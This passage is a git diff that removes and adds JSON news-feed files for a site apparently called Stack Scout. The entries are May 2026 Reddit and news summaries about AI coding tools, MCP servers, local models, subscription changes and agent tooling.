"https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T09:11:15.000Z", - "summary": "OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \\~150 engineers). The pitch: embed \"Forward Deployed Engineers\" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between \"model capability\" and \"production deployment\" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. For the ML community this should…", - "category": "ai_research" - }, - { - "title": "You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T06:38:26.000Z", - "summary": "Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. Seeing people now publishing workarounds instead of going A…", - "category": "ai_tools" - }, - { - "title": "I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-14T06:09:37.000Z", - "summary": "I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no \"any\". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. Here's what I found out: Claude Code (Opus 4.7): \\- Verified MCP before writing a line \\- Built 36 files in 12 minutes \\- Wrote its own WebSocket smoke test (3ms broadcast) \\- Zero errors first run \\- Total cost: \\~$2.50 Codex (GPT-5.5 via Cursor): \\- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \\- Task 2 shipped but needed a patch for infinite React loop \\- 28 files, more compact architecture \\- Total cost: \\~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. For co…", - "category": "ai_tools" - }, - { - "title": "Last week in Generative Image & Video", - "url": "https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T04:43:38.000Z", - "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \\- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \\- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \\- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. | [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?…", - "category": "creative_tools" - }, - { - "title": "Fully Realtime Interaction Models", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-14T02:25:36.000Z", - "summary": "I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/)", - "category": "ai_models" - }, - { - "title": "Open-source, self-updating wiki for your codebase", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-14T01:47:30.000Z", - "summary": "I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-15.json b/data/news-feed-2026-05-15.json deleted file mode 100644 index 4aa1f27..0000000 --- a/data/news-feed-2026-05-15.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.183Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-15", - "article_count": 15, - "archived_story_count": 629, - "articles": [ - { - "title": "Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?", - "url": "https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-15T17:30:17.000Z", - "summary": "Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? Would love to hear real-world workflows instead of generic AI tips.", - "category": "ai_tools" - }, - { - "title": "I built a free Google search MCP that actually works(searching, fetching, with PDF)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-15T13:18:10.000Z", - "summary": "✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: \"abstract\"` returns \\~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \\~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\\~1500 chars), letting the agent triage relevance, then call `extract` with `mode…", - "category": "ai_tools" - }, - { - "title": "Claude for Healthcare launched in January — but medical imaging is the obvious gap. Anyone else noticing?", - "url": "https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-15T16:19:44.000Z", - "summary": "I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call.", - "category": "ai_tools" - }, - { - "title": "Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-15T14:09:53.000Z", - "summary": "built an open source memory layer for ai agents. thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. lead with \"observability and accountability for ai agents\" instead of \"memory for ai agents\". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months", - "category": "ai_tools" - }, - { - "title": "I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-15T12:21:22.000Z", - "summary": "There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback.", - "category": "ai_tools" - }, - { - "title": "Built a tool that publishes HTML artifacts securely behind company auth", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-15T12:07:44.000Z", - "summary": "Hey! Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course.", - "category": "ai_tools" - }, - { - "title": "Anthropic built the agentic features. Now they're billing them separately.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-15T03:08:21.000Z", - "summary": "Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic (\"this was inevitable, the old model was broken\") - About 15% neutral to supportive (\"interactive use is untouched, this is fair\") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. He said he now has to make the Claude Code experience on T3 Code \"significantly worse.\" Ben Hylak (co-founder of Raindrop.ai) responded: \"This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs.\" Theo also said: \"Framing this as a free credit instead of a regression for…", - "category": "ai_tools" - }, - { - "title": "Adaptive Markdown", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-15T00:23:24.000Z", - "summary": "I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \\-Turning articles and books into personalized learning objects \\- lecture notes with automatically maintained structure \\-documents with embedded code, tables, consoles, images, audio, or video \\-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat…", - "category": "ai_tools" - }, - { - "title": "Memory drift? Context bloat? A Claude Code skill I wrote to manage long-running memory libraries", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.99, - "date": "2026-05-15T11:34:28.000Z", - "summary": "I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for \"that bug we fixed last month\" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** \"Audit memory\" runs the script. \"Review session\" walks the recent session and surfaces what's worth keeping.…", - "category": "ai_tools" - }, - { - "title": "SailPoint Unveils Agentic Fabric for AI Agent Security", - "url": "https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security", - "source": "AI Magazine", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 0.7, - "date": "2026-05-15T18:00:34.440Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Open-weights vs. closed models: Nano Banana Pro was nerf'ed", - "url": "https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-15T23:27:46.000Z", - "summary": "Companies think that they can nerf the model and people won't notice. Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \\[dev\\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/…", - "category": "creative_tools" - }, - { - "title": "AllenAI has been iterating on their MolmoAct2 models for robotics", - "url": "https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-15T21:30:46.000Z", - "summary": "r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look.", - "category": "ai_models" - }, - { - "title": "Gemma4 26b MoE running in MLX with turboquant (and custom kernel)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-15T19:34:12.000Z", - "summary": "TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\\_XS + q4\\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y…", - "category": "ai_models" - }, - { - "title": "Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-15T17:32:50.000Z", - "summary": "Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. **Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said \"I don't have inform…", - "category": "ai_research" - }, - { - "title": "Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-15T14:35:49.000Z", - "summary": "Claude Code learns your codebase by brute force every session. A single architectural question such as; \"Where does request validation happen?\" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, \"we did it this way because\" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. Before then I hoped to f…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-16.json b/data/news-feed-2026-05-16.json deleted file mode 100644 index c6a402f..0000000 --- a/data/news-feed-2026-05-16.json +++ /dev/null @@ -1,275 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.446Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-16", - "article_count": 15, - "archived_story_count": 407, - "articles": [ - { - "title": "Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-16T14:50:57.000Z", - "summary": "Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \\- 100 apps (was 50) \\- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \\- back behavior wrong, no system back \\- flat surfaces, no Material elevation \\- tab bar where a nav drawer or bottom nav belongs \\- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \\- Product intent: hierarchy, flow, states. Invariant across platforms. \\- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y…", - "category": "ai_tools" - }, - { - "title": "GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "github_release" - ], - "matching_tags": [ - "api_update", - "open_source", - "github_release" - ], - "importance": 1, - "date": "2026-05-16T18:12:10.000Z", - "summary": "Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. **What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. * Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm…", - "category": "ai_models" - }, - { - "title": "macOS support in Lemonade has graduated out of beta!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-16T14:40:45.000Z", - "summary": "All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", - "category": "ai_models" - }, - { - "title": "Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result", - "url": "https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-16T08:28:58.000Z", - "summary": "[error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: \"sdk\\_stream\\_ended\\_no\\_result\", had\\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \\[Stall\\] stream\\_idle\\_partial lastChunkAgeMs=15002 bytesTotal=669 